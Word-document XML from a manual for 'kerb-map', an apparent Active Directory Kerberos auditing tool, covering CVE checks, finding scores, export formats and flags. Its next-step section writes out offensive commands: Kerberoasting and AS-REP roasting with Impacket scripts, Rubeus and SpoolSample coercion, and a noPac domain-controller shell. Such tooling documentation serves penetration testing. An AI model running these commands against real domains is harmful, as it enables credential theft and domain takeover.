        </w:rPr>
        <w:t xml:space="preserve">Checks the domain functional level and DC build number against the patch that fixed Kerberos PAC validation. Domains running pre-2014 patch levels are flagged. This is a legacy check but still relevant in environments with unpatched DCs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.7 GPP Passwords (MS14-025)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Reads Group Policy Preference XML files from the SYSVOL share (Groups.xml, Services.xml, Scheduledtasks.xml, Datasources.xml, Printers.xml, Drives.xml). If any contain a cpassword attribute, kerb-map decrypts it using the publicly known AES key and reports the plaintext credential.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.8 Bronze Bit (CVE-2020-17049)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Queries constrained delegation accounts and checks whether the domain controller has the November 2020 patch for the S4U2Proxy forwardable bit bypass. An unpatched DC allows an attacker with a constrained delegation account to forge service tickets to any SPN, even if the target service is marked as not allowing delegation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.9 Certifried (CVE-2022-26923)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Checks whether computer accounts can enroll in certificate templates that include the dNSHostName in the subject. An unpatched environment allows a low-privilege user who can create machine accounts (default quota: 10) to obtain a certificate as a DC and perform authentication as that DC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.10 LDAP Signing Not Required</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Queries the domain controller’s LDAP rootDSE and checks the supportedLDAPPolicies for signing requirements. If LDAP signing is not required, the domain is vulnerable to NTLM relay attacks targeting LDAP (e.g., with ntlmrelayx). This finding is scored at 70.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 6 — Scoring &amp; Priority Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 How Findings Are Ranked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Every finding in kerb-map receives a score from 0 to 100. The priority engine uses these scores to produce a single, sorted list of actionable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Finding Type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Score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noPac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95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sAMAccountName impersonation — direct path to DCSync</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ZeroLogon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95</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Netlogon privilege escalation — domain takeover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PrintNightmare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95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Remote code execution on domain controller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PetitPotam + Relay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90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Coerced auth — relay to AD CS for domain admin cert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AD CS ESC1–ESC8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85–95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Certificate abuse paths — score varies by ESC type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Trust Abuse (Forest)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90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Cross-forest SID injection — forest-level compromise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Unconstrained Delegation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85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Full impersonation to any service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Kerberoast (high score)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75–85</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SPN with weak encryption, old password, admin group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Trust Abuse (Bidir)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75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Bidirectional trust without SID filtering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AS-REP Roast (admin)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90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Pre-auth disabled on privileged account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AS-REP Roast (standard)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75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Pre-auth disabled on standard account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LDAP Signing Not Required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70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NTLM relay to LDAP is possible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Constrained Deleg + Proto Trans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70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S4U2Self/S4U2Proxy abuse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Weak DC Encryption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65</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DC advertising RC4/DES support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RC4-only Account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65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User/computer limited to RC4</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DES Account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60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Deprecated cipher enabled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GPP Password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60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Plaintext creds in SYSVOL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Bronze Bit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60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S4U2Proxy forwardable bypass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Certifried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80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Machine certificate impersonation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MS14-068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55</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Legacy Kerberos PAC validation bypass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RBCD (writable)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65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Resource-based constrained delegation misconfiguration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DnsAdmins Member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60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DLL injection path via DNS service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Kerberoast (low score)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40–55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SPN with AES, recent password, non-admin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Stale Account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30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Enabled account with no recent logon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Next Step Generation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">For every finding, kerb-map generates a concrete next-step command.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 Kerberoast finding (score 82):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GetUserSPNs.py CORP.LOCAL/jsmith:'Password123' -request -outputfile hashes.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># AS-REP finding (score 75):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GetNPUsers.py CORP.LOCAL/ -usersfile asrep_users.txt -format hashcat -outputfile asrep.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># Unconstrained delegation (score 85):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># 1. Set up listener: Rubeus.exe monitor /interval:5 /filteruser:DC01$</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># 2. Coerce auth: SpoolSample.exe DC01 YOURHOST</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># noPac (score 95):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">noPac.py CORP.LOCAL/jsmith:'Password123' -dc-ip 10.10.10.1 -shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 7 — Output &amp; Export</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 Terminal Output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, kerb-map prints results directly to the terminal using the Rich library. The output is divided into the following sections:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan banner and authentication status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SPN scan results (sorted by score)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">AS-REP roastable accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Delegation findings (unconstrained, constrained, RBCD)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">User enumeration summary (privileged users, stale accounts, policy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Encryption audit results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Trust mapping results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Priority-ranked finding summary with next steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 JSON Export (-o json)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The -o json flag writes all findings to a structured JSON file. The output includes metadata (scan timestamp, domain, DC, modules run) and an array of findings, each with type, score, details, and next_step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python kerb-map.py -d CORP.LOCAL -u jsmith -p 'Pass' -dc 10.10.10.1 -o json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># Output: kerb-map_CORP.LOCAL_20250319_143022.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 BloodHound Export (-o bloodhound)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The -o bloodhound flag generates BloodHound-compatible JSON files that can be imported into BloodHound Community Edition or the legacy BloodHound interface. The export includes custom properties on nodes (kerberoast_score, asrep_vulnerable, delegation_type) so that findings can be visualised in the attack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python kerb-map.py -d CORP.LOCAL -u jsmith -p 'Pass' -dc 10.10.10.1 -o bloodhound</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># Output: kerb-map_CORP.LOCAL_bloodhound.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.4 Scan History Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kerb-map stores all scan results in a local SQLite database (~/.kerb-map/history.db). This enables comparison between scans and tracking of remediation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 List all previous scans</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python kerb-map.py --list-scans</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># Show details of a specific scan</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python kerb-map.py --show-scan 3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># Compare two scans</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python kerb-map.py --diff-scans 3 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 8 — Complete Flag Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 Target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Flag</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Required</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 / --domain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Yes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Target domain (e.g., CORP.LOCAL)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-u / --user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Yes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Username for authentication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 / --password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Plaintext password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-H / --hash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No*</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NTLM hash (LM:NT or NT-only)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-k / --kerberos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Use Kerberos authentication (requires KRB5CCNAME)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-dc / --dc-ip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Yes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Domain controller IP or FQDN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--ldaps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Use LDAP over SSL (port 636)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">* One of -p, -H, or -k is required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2 Module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Flag</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--spn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Run SPN scanner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--asrep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Run AS-REP scanner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--delegation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Run delegation mapper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--users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Run user enumerator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--encryption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Run encryption auditor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--trusts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Run trust mapper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--cves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Enable CVE detection modules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--all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Run all modules (default when no module flag specified)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
